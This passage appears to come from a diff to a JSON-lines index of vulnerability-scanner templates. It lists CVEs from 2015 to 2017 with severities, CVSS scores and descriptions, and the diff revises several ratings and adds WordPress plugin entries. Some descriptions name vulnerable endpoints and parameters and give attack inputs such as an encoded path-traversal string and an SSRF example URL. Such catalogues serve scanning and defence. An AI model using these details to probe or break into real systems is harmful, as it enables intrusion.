Traversal","Severity":"high","Description":"Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-4632.yaml"} -{"ID":"CVE-2015-4666","Info":{"Name":"Xceedium Xsuite \u003c=2.4.4.5 - Local File Inclusion","Severity":"high","Description":"Xceedium Xsuite 2.4.4.5 and earlier is vulnerable to local file inclusion via opm/read_sessionlog.php that allows remote attackers to read arbitrary files in the logFile parameter.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-4666.yaml"} +{"ID":"CVE-2015-4666","Info":{"Name":"Xceedium Xsuite \u003c=2.4.4.5 - Local File Inclusion","Severity":"medium","Description":"Xceedium Xsuite 2.4.4.5 and earlier is vulnerable to local file inclusion via opm/read_sessionlog.php that allows remote attackers to read arbitrary files in the logFile parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-4666.yaml"} {"ID":"CVE-2015-4668","Info":{"Name":"Xsuite \u003c=2.4.4.5 - Open Redirect","Severity":"medium","Description":"Xsuite 2.4.4.5 and prior contains an open redirect vulnerability, which can allow a remote attacker to redirect users to arbitrary web sites and conduct phishing attacks via a malicious URL in the redirurl parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2015/CVE-2015-4668.yaml"} {"ID":"CVE-2015-4694","Info":{"Name":"WordPress Zip Attachments \u003c= 1.1.4 - Arbitrary File Retrieval","Severity":"high","Description":"WordPress zip-attachments plugin allows arbitrary file retrieval as it does not check the download path of the requested file.","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2015/CVE-2015-4694.yaml"} -{"ID":"CVE-2015-5354","Info":{"Name":"Novius OS 5.0.1-elche - Open Redirect","Severity":"medium","Description":"Novius OS 5.0.1 (Elche) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect parameter to admin/nos/login.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2015/CVE-2015-5354.yaml"} +{"ID":"CVE-2015-5354","Info":{"Name":"Novius OS 5.0.1-elche - Open Redirect","Severity":"medium","Description":"Novius OS 5.0.1 (Elche) allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect parameter to admin/nos/login.","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2015/CVE-2015-5354.yaml"} {"ID":"CVE-2015-5461","Info":{"Name":"WordPress StageShow \u003c5.0.9 - Open Redirect","Severity":"medium","Description":"WordPress StageShow plugin before 5.0.9 contains an open redirect vulnerability in the Redirect function in stageshow_redirect.php. A remote attacker can redirect users to arbitrary web sites and conduct phishing attacks via a malicious URL in the url parameter.","Classification":{"CVSSScore":"6.4"}},"file_path":"http/cves/2015/CVE-2015-5461.yaml"} {"ID":"CVE-2015-5469","Info":{"Name":"WordPress MDC YouTube Downloader 2.1.0 - Local File Inclusion","Severity":"high","Description":"WordPress MDC YouTube Downloader 2.1.0 plugin is susceptible to local file inclusion. A remote attacker can read arbitrary files via a full pathname in the file parameter to includes/download.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-5469.yaml"} {"ID":"CVE-2015-5471","Info":{"Name":"Swim Team \u003c= v1.44.10777 - Local File Inclusion","Severity":"medium","Description":"The program /wp-swimteam/include/user/download.php allows unauthenticated attackers to retrieve arbitrary files from the system.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2015/CVE-2015-5471.yaml"} -{"ID":"CVE-2015-5531","Info":{"Name":"ElasticSearch \u003c1.6.1 - Local File Inclusion","Severity":"high","Description":"ElasticSearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-5531.yaml"} -{"ID":"CVE-2015-5688","Info":{"Name":"Geddy \u003c13.0.8 - Local File Inclusion","Severity":"high","Description":"Geddy prior to version 13.0.8 contains a directory traversal vulnerability in lib/app/index.js that allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-5688.yaml"} +{"ID":"CVE-2015-5531","Info":{"Name":"ElasticSearch \u003c1.6.1 - Local File Inclusion","Severity":"medium","Description":"ElasticSearch before 1.6.1 allows remote attackers to read arbitrary files via unspecified vectors related to snapshot API calls.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-5531.yaml"} +{"ID":"CVE-2015-5688","Info":{"Name":"Geddy \u003c13.0.8 - Local File Inclusion","Severity":"medium","Description":"Geddy prior to version 13.0.8 contains a directory traversal vulnerability in lib/app/index.js that allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-5688.yaml"} {"ID":"CVE-2015-6477","Info":{"Name":"Nordex NC2 - Cross-Site Scripting","Severity":"medium","Description":"Nordex NC2 contains a cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-6477.yaml"} {"ID":"CVE-2015-6544","Info":{"Name":"Combodo iTop \u003c2.2.0-2459 - Cross-Site Scripting","Severity":"medium","Description":"Combodo iTop before 2.2.0-2459 contains a cross-site scripting vulnerability in application/dashboard.class.inc.php which allows remote attackers to inject arbitrary web script or HTML via a dashboard title.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2015/CVE-2015-6544.yaml"} {"ID":"CVE-2015-6920","Info":{"Name":"WordPress sourceAFRICA \u003c=0.1.3 - Cross-Site Scripting","Severity":"medium","Description":"WordPress sourceAFRICA plugin version 0.1.3 contains a cross-site scripting vulnerability.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-6920.yaml"} @@ -299,11 +303,12 @@ {"ID":"CVE-2015-7377","Info":{"Name":"WordPress Pie-Register \u003c2.0.19 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Pie Register before 2.0.19 contains a reflected cross-site scripting vulnerability in pie-register/pie-register.php which allows remote attackers to inject arbitrary web script or HTML via the invitaion_code parameter in a pie-register page to the default URL.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-7377.yaml"} {"ID":"CVE-2015-7450","Info":{"Name":"IBM WebSphere Java Object Deserialization - Remote Code Execution","Severity":"critical","Description":"IBM Websphere Application Server 7, 8, and 8.5 have a deserialization vulnerability in the SOAP Connector (port 8880 by default).","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2015/CVE-2015-7450.yaml"} {"ID":"CVE-2015-7780","Info":{"Name":"ManageEngine Firewall Analyzer \u003c8.0 - Local File Inclusion","Severity":"medium","Description":"ManageEngine Firewall Analyzer before 8.0 is vulnerable to local file inclusion.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2015/CVE-2015-7780.yaml"} -{"ID":"CVE-2015-7823","Info":{"Name":"Kentico CMS 8.2 - Open Redirect","Severity":"low","Description":"Kentico CMS 8.2 contains an open redirect vulnerability via GetDocLink.ashx with link variable. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain.","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2015/CVE-2015-7823.yaml"} +{"ID":"CVE-2015-7823","Info":{"Name":"Kentico CMS 8.2 - Open Redirect","Severity":"medium","Description":"Kentico CMS 8.2 contains an open redirect vulnerability via GetDocLink.ashx with link variable. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain.","Classification":{"CVSSScore":"5.8"}},"file_path":"http/cves/2015/CVE-2015-7823.yaml"} {"ID":"CVE-2015-8349","Info":{"Name":"SourceBans \u003c2.0 - Cross-Site Scripting","Severity":"medium","Description":"SourceBans before 2.0 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2015/CVE-2015-8349.yaml"} {"ID":"CVE-2015-8399","Info":{"Name":"Atlassian Confluence \u003c5.8.17 - Information Disclosure","Severity":"medium","Description":"Atlassian Confluence before 5.8.17 contains an information disclsoure vulnerability. A remote authenticated user can read configuration files via the decoratorName parameter to (1) spaces/viewdefaultdecorator.action or (2) admin/viewdefaultdecorator.action.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-8399.yaml"} {"ID":"CVE-2015-8813","Info":{"Name":"Umbraco \u003c7.4.0- Server-Side Request Forgery","Severity":"high","Description":"Umbraco before version 7.4.0 contains a server-side request forgery vulnerability in feedproxy.aspx that allows attackers to send arbitrary HTTP GET requests via http://local/Umbraco/feedproxy.aspx?url=http://127.0.0.1:80/index.","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2015/CVE-2015-8813.yaml"} {"ID":"CVE-2015-9312","Info":{"Name":"NewStatPress \u003c=1.0.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress NewStatPress plugin through 1.0.4 contains a cross-site scripting vulnerability. The plugin utilizes, on lines 28 and 31 of the file \"includes/nsp_search.php\", several variables from the $_GET scope without sanitation. While WordPress automatically escapes quotes on this scope, the outputs on these lines are outside of quotes, and as such can be utilized to initiate a cross-site scripting attack.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2015/CVE-2015-9312.yaml"} +{"ID":"CVE-2015-9323","Info":{"Name":"404 to 301 \u003c= 2.0.2 - Authenticated Blind SQL Injection","Severity":"critical","Description":"The 404 to 301 – Redirect, Log and Notify 404 Errors WordPress plugin was affected by an Authenticated Blind SQL Injection security vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2015/CVE-2015-9323.yaml"} {"ID":"CVE-2015-9414","Info":{"Name":"WordPress Symposium \u003c=15.8.1 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Symposium through 15.8.1 contains a reflected cross-site scripting vulnerability via the wp-content/plugins/wp-symposium/get_album_item.php?size parameter which allows an attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2015/CVE-2015-9414.yaml"} {"ID":"CVE-2015-9480","Info":{"Name":"WordPress RobotCPA 5 - Directory Traversal","Severity":"high","Description":"The RobotCPA plugin 5 for WordPress has directory traversal via the f.php l parameter.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-9480.yaml"} {"ID":"CVE-2016-0957","Info":{"Name":"Adobe AEM Dispatcher \u003c4.15 - Rules Bypass","Severity":"high","Description":"Dispatcher before 4.1.5 in Adobe Experience Manager 5.6.1, 6.0.0, and 6.1.0 does not properly implement a URL filter, which allows remote attackers to bypass dispatcher rules via unspecified vectors.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2016/CVE-2016-0957.yaml"} @@ -333,6 +338,7 @@ {"ID":"CVE-2016-1000154","Info":{"Name":"WordPress WHIZZ \u003c=1.0.7 - Cross-Site Scripting","Severity":"medium","Description":"WordPress plugin WHIZZ 1.07 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2016/CVE-2016-1000154.yaml"} {"ID":"CVE-2016-1000155","Info":{"Name":"WordPress WPSOLR \u003c=8.6 - Cross-Site Scripting","Severity":"medium","Description":"WordPress WPSOLR 8.6 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2016/CVE-2016-1000155.yaml"} {"ID":"CVE-2016-10033","Info":{"Name":"WordPress PHPMailer \u003c 5.2.18 - Remote Code Execution","Severity":"critical","Description":"WordPress PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted Sender property in isMail transport.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2016/CVE-2016-10033.yaml"} +{"ID":"CVE-2016-10108","Info":{"Name":"Western Digital MyCloud NAS - Command Injection","Severity":"critical","Description":"Unauthenticated Remote Command injection as root occurs in the Western Digital MyCloud NAS 2.11.142 /web/google_analytics.php URL via a modified arg parameter in the POST data.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2016/CVE-2016-10108.yaml"} {"ID":"CVE-2016-10134","Info":{"Name":"Zabbix - SQL Injection","Severity":"critical","Description":"Zabbix before 2.2.14 and 3.0 before 3.0.4 allows remote attackers to execute arbitrary SQL commands via the toggle_ids array parameter in latest.php and perform SQL injection attacks.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2016/CVE-2016-10134.yaml"} {"ID":"CVE-2016-10367","Info":{"Name":"Opsview Monitor Pro - Local File Inclusion","Severity":"high","Description":"Opsview Monitor Pro prior to 5.1.0.162300841, prior to 5.0.2.27475, prior to 4.6.4.162391051, and 4.5.x without a certain 2016 security patch is vulnerable to unauthenticated local file inclusion and can be exploited by issuing a specially crafted HTTP GET request utilizing a simple bypass.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2016/CVE-2016-10367.yaml"} {"ID":"CVE-2016-10368","Info":{"Name":"Opsview Monitor Pro - Open Redirect","Severity":"medium","Description":"Opsview Monitor Pro before 5.1.0.162300841, before 5.0.2.27475, before 4.6.4.162391051, and 4.5.x without a certain 2016 security patch contains an open redirect vulnerability. An attacker can redirect users to arbitrary web sites and conduct phishing attacks via the back parameter to the login URI.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2016/CVE-2016-10368.yaml"} @@ -340,6 +346,7 @@ {"ID":"CVE-2016-10940","Info":{"Name":"WordPress zm-gallery plugin 1.0 SQL Injection","Severity":"high","Description":"zm-gallery plugin 1.0 for WordPress is susceptible to SQL injection via the order parameter.","Classification":{"CVSSScore":"7.2"}},"file_path":"http/cves/2016/CVE-2016-10940.yaml"} {"ID":"CVE-2016-10956","Info":{"Name":"WordPress Mail Masta 1.0 - Local File Inclusion","Severity":"high","Description":"WordPress Mail Masta 1.0 is susceptible to local file inclusion in count_of_send.php and csvexport.php.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2016/CVE-2016-10956.yaml"} {"ID":"CVE-2016-10960","Info":{"Name":"WordPress wSecure Lite \u003c 2.4 - Remote Code Execution","Severity":"high","Description":"WordPress wsecure plugin before 2.4 is susceptible to remote code execution via shell metacharacters in the wsecure-config.php publish parameter.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2016/CVE-2016-10960.yaml"} +{"ID":"CVE-2016-10973","Info":{"Name":"Brafton WordPress Plugin \u003c 3.4.8 - Cross-Site Scripting","Severity":"medium","Description":"The Brafton plugin before 3.4.8 for WordPress has XSS via the wp-admin/admin.php?page=BraftonArticleLoader tab parameter to BraftonAdminPage.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2016/CVE-2016-10973.yaml"} {"ID":"CVE-2016-10993","Info":{"Name":"ScoreMe Theme - Cross-Site Scripting","Severity":"medium","Description":"WordPress ScoreMe theme through 2016-04-01 contains a reflected cross-site scripting vulnerability via the s parameter which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2016/CVE-2016-10993.yaml"} {"ID":"CVE-2016-1555","Info":{"Name":"NETGEAR WNAP320 Access Point Firmware - Remote Command Injection","Severity":"critical","Description":"NETGEAR WNAP320 Access Point Firmware version 2.0.3 could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2016/CVE-2016-1555.yaml"} {"ID":"CVE-2016-2389","Info":{"Name":"SAP xMII 15.0 for SAP NetWeaver 7.4 - Local File Inclusion","Severity":"high","Description":"SAP xMII 15.0 for SAP NetWeaver 7.4 is susceptible to a local file inclusion vulnerability in the GetFileList function. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the path parameter to /Catalog, aka SAP Security Note 2230978.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2016/CVE-2016-2389.yaml"} @@ -350,7 +357,7 @@ {"ID":"CVE-2016-4975","Info":{"Name":"Apache mod_userdir CRLF injection","Severity":"medium","Description":"Apache CRLF injection allowing HTTP response splitting attacks on sites using mod_userdir.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2016/CVE-2016-4975.yaml"} {"ID":"CVE-2016-4977","Info":{"Name":"Spring Security OAuth2 Remote Command Execution","Severity":"high","Description":"Spring Security OAuth versions 2.0.0 to 2.0.9 and 1.0.0 to 1.0.5 contain a remote command execution vulnerability. When processing authorization requests using the whitelabel views, the response_type parameter value was executed as Spring SpEL which enabled a malicious user to trigger remote command execution via the crafting of the value for response_type.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2016/CVE-2016-4977.yaml"} {"ID":"CVE-2016-5649","Info":{"Name":"NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure","Severity":"critical","Description":"NETGEAR DGN2200 / DGND3700 is susceptible to a vulnerability within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. The attacker can then use this password to gain administrator access of the targeted router's web interface.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2016/CVE-2016-5649.yaml"} -{"ID":"CVE-2016-6195","Info":{"Name":"vBulletin \u003c= 4.2.3 - SQL Injection","Severity":"high","Description":"vBulletin versions 3.6.0 through 4.2.3 are vulnerable to an SQL injection vulnerability in the vBulletin core forumrunner addon. The vulnerability allows an attacker to execute arbitrary SQL queries and potentially access sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2016/CVE-2016-6195.yaml"} +{"ID":"CVE-2016-6195","Info":{"Name":"vBulletin \u003c= 4.2.3 - SQL Injection","Severity":"critical","Description":"vBulletin versions 3.6.0 through 4.2.3 are vulnerable to an SQL injection vulnerability in the vBulletin core forumrunner addon. The vulnerability allows an attacker to execute arbitrary SQL queries and potentially access sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2016/CVE-2016-6195.yaml"} {"ID":"CVE-2016-6277","Info":{"Name":"NETGEAR Routers - Remote Code Execution","Severity":"high","Description":"NETGEAR routers R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly others allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2016/CVE-2016-6277.yaml"} {"ID":"CVE-2016-6601","Info":{"Name":"ZOHO WebNMS Framework \u003c5.2 SP1 - Local File Inclusion","Severity":"high","Description":"ZOHO WebNMS Framework before version 5.2 SP1 is vulnerable local file inclusion which allows an attacker to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2016/CVE-2016-6601.yaml"} {"ID":"CVE-2016-7552","Info":{"Name":"Trend Micro Threat Discovery Appliance 2.6.1062r1 - Authentication Bypass","Severity":"critical","Description":"Trend Micro Threat Discovery Appliance 2.6.1062r1 is vulnerable to a directory traversal vulnerability when processing a session_id cookie, which allows a remote, unauthenticated attacker to delete arbitrary files as root. This can be used to bypass authentication or cause a DoS.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2016/CVE-2016-7552.yaml"} @@ -379,7 +386,7 @@ {"ID":"CVE-2017-12583","Info":{"Name":"DokuWiki - Cross-Site Scripting","Severity":"medium","Description":"DokuWiki through 2017-02-19b contains a cross-site scripting vulnerability in the DATE_AT parameter to doku.php which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-12583.yaml"} {"ID":"CVE-2017-12611","Info":{"Name":"Apache Struts2 S2-053 - Remote Code Execution","Severity":"critical","Description":"Apache Struts 2.0.0 through 2.3.33 and 2.5 through 2.5.10.1 uses an unintentional expression in a Freemarker tag instead of string literals, which makes it susceptible to remote code execution attacks.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2017/CVE-2017-12611.yaml"} {"ID":"CVE-2017-12615","Info":{"Name":"Apache Tomcat Servers - Remote Code Execution","Severity":"high","Description":"Apache Tomcat servers 7.0.{0 to 79} are susceptible to remote code execution. By design, you are not allowed to upload JSP files via the PUT method. This is likely a security measure to prevent an attacker from uploading a JSP shell and gaining remote code execution on the server. However, due to the insufficient checks, an attacker could gain remote code execution on Apache Tomcat servers that have enabled PUT method by using a specially crafted HTTP request.\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2017/CVE-2017-12615.yaml"} -{"ID":"CVE-2017-12617","Info":{"Name":"Apache Tomcat - Remote Code Execution","Severity":"high","Description":"When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC1 to 8.0.46 and 7.0.0 to 7.0.81 with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.\n","Classification":{"CVSSScore":"8.3"}},"file_path":"http/cves/2017/CVE-2017-12617.yaml"} +{"ID":"CVE-2017-12617","Info":{"Name":"Apache Tomcat - Remote Code Execution","Severity":"high","Description":"When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC1 to 8.0.46 and 7.0.0 to 7.0.81 with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2017/CVE-2017-12617.yaml"} {"ID":"CVE-2017-12629","Info":{"Name":"Apache Solr \u003c= 7.1 - XML Entity Injection","Severity":"critical","Description":"Apache Solr with Apache Lucene before 7.1 is susceptible to remote code execution by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is NOT vulnerable to this. Note that the XML external entity expansion vulnerability occurs in the XML Query Parser which is available, by default, for any query request with parameters deftype=xmlparser and can be exploited to upload malicious data to the /upload request handler or as Blind XXE using ftp wrapper in order to read arbitrary local files from the Solr server. Note also that the second vulnerability relates to remote code execution using the RunExecutableListener available on all affected versions of Solr.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2017/CVE-2017-12629.yaml"} {"ID":"CVE-2017-12635","Info":{"Name":"Apache CouchDB 1.7.0 / 2.x \u003c 2.1.1 - Remote Privilege Escalation","Severity":"critical","Description":"Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keysfor 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behavior that if two 'roles' keys are available in the JSON, the second one will be used for authorizing the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2017/CVE-2017-12635.yaml"} {"ID":"CVE-2017-12637","Info":{"Name":"SAP NetWeaver Application Server Java 7.5 - Local File Inclusion","Severity":"high","Description":"SAP NetWeaver Application Server Java 7.5 is susceptible to local file inclusion in scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the query string, as exploited in the wild in August 2017, aka SAP Security Note 2486657.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2017/CVE-2017-12637.yaml"} @@ -407,7 +414,35 @@ {"ID":"CVE-2017-17731","Info":{"Name":"DedeCMS 5.7 - SQL Injection","Severity":"critical","Description":"DedeCMS through 5.7 has SQL Injection via the $_FILES superglobal to plus/recommend.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2017/CVE-2017-17731.yaml"} {"ID":"CVE-2017-17736","Info":{"Name":"Kentico - Installer Privilege Escalation","Severity":"critical","Description":"Kentico 9.0 before 9.0.51 and 10.0 before 10.0.48 are susceptible to a privilege escalation attack. An attacker can obtain Global Administrator access by visiting CMSInstall/install.aspx and then navigating to the CMS Administration Dashboard.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2017/CVE-2017-17736.yaml"} {"ID":"CVE-2017-18024","Info":{"Name":"AvantFAX 3.3.3 - Cross-Site Scripting","Severity":"medium","Description":"AvantFAX 3.3.3 contains a cross-site scripting vulnerability via an arbitrary parameter name submitted to the default URL, as demonstrated by a parameter whose name contains a SCRIPT element and whose value is 1.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18024.yaml"} +{"ID":"CVE-2017-18487","Info":{"Name":"AdPush \u003c 1.44 - Cross-Site Scripting","Severity":"medium","Description":"The adsense-plugin (aka Google AdSense) plugin before 1.44 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18487.yaml"} +{"ID":"CVE-2017-18490","Info":{"Name":"Contact Form Multi by BestWebSoft \u003c 1.2.1 - Cross-Site Scripting","Severity":"medium","Description":"The contact-form-multi plugin before 1.2.1 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18490.yaml"} +{"ID":"CVE-2017-18491","Info":{"Name":"Contact Form by BestWebSoft \u003c 4.0.6 - Cross-Site Scripting","Severity":"medium","Description":"The contact-form-plugin plugin before 4.0.6 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18491.yaml"} +{"ID":"CVE-2017-18492","Info":{"Name":"Contact Form to DB by BestWebSoft \u003c 1.5.7 - Cross-Site Scripting","Severity":"medium","Description":"The contact-form-to-db plugin before 1.5.7 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18492.yaml"} +{"ID":"CVE-2017-18493","Info":{"Name":"Custom Admin Page by BestWebSoft \u003c 0.1.2 - Cross-Site Scripting","Severity":"medium","Description":"The custom-admin-page plugin before 0.1.2 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18493.yaml"} +{"ID":"CVE-2017-18494","Info":{"Name":"Custom Search by BestWebSoft \u003c 1.36 - Cross-Site Scripting","Severity":"medium","Description":"The custom-search-plugin plugin before 1.36 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18494.yaml"} +{"ID":"CVE-2017-18496","Info":{"Name":"Htaccess by BestWebSoft \u003c 1.7.6 - Cross-Site Scripting","Severity":"medium","Description":"The htaccess plugin before 1.7.6 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18496.yaml"} +{"ID":"CVE-2017-18500","Info":{"Name":"Social Buttons Pack by BestWebSof \u003c 1.1.1 - Cross-Site Scripting","Severity":"medium","Description":"The social-buttons-pack plugin before 1.1.1 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18500.yaml"} +{"ID":"CVE-2017-18501","Info":{"Name":"Social Login by BestWebSoft \u003c 0.2 - Cross-Site Scripting","Severity":"medium","Description":"The social-login-bws plugin before 0.2 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18501.yaml"} +{"ID":"CVE-2017-18502","Info":{"Name":"Subscriber by BestWebSoft \u003c 1.3.5 - Cross-Site Scripting","Severity":"medium","Description":"The subscriber plugin before 1.3.5 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18502.yaml"} +{"ID":"CVE-2017-18505","Info":{"Name":"BestWebSoft's Twitter \u003c 2.55 - Cross-Site Scripting","Severity":"medium","Description":"The twitter-plugin plugin before 2.55 for WordPress has XSS.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18505.yaml"} +{"ID":"CVE-2017-18516","Info":{"Name":"LinkedIn by BestWebSoft \u003c 1.0.5 - Cross-Site Scripting","Severity":"medium","Description":"The bws-linkedin plugin before 1.0.5 for WordPress has multiple XSS issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2017/CVE-2017-18516.yaml"} +{"ID":"CVE-2017-18517","Info":{"Name":"Pinterest by BestWebSoft \u003c 1.0.5 - Cross-Site Scripting","Severity":"medium","Description":"The bws-pinterest plugin before 1.0.5 for WordPress has multiple XSS 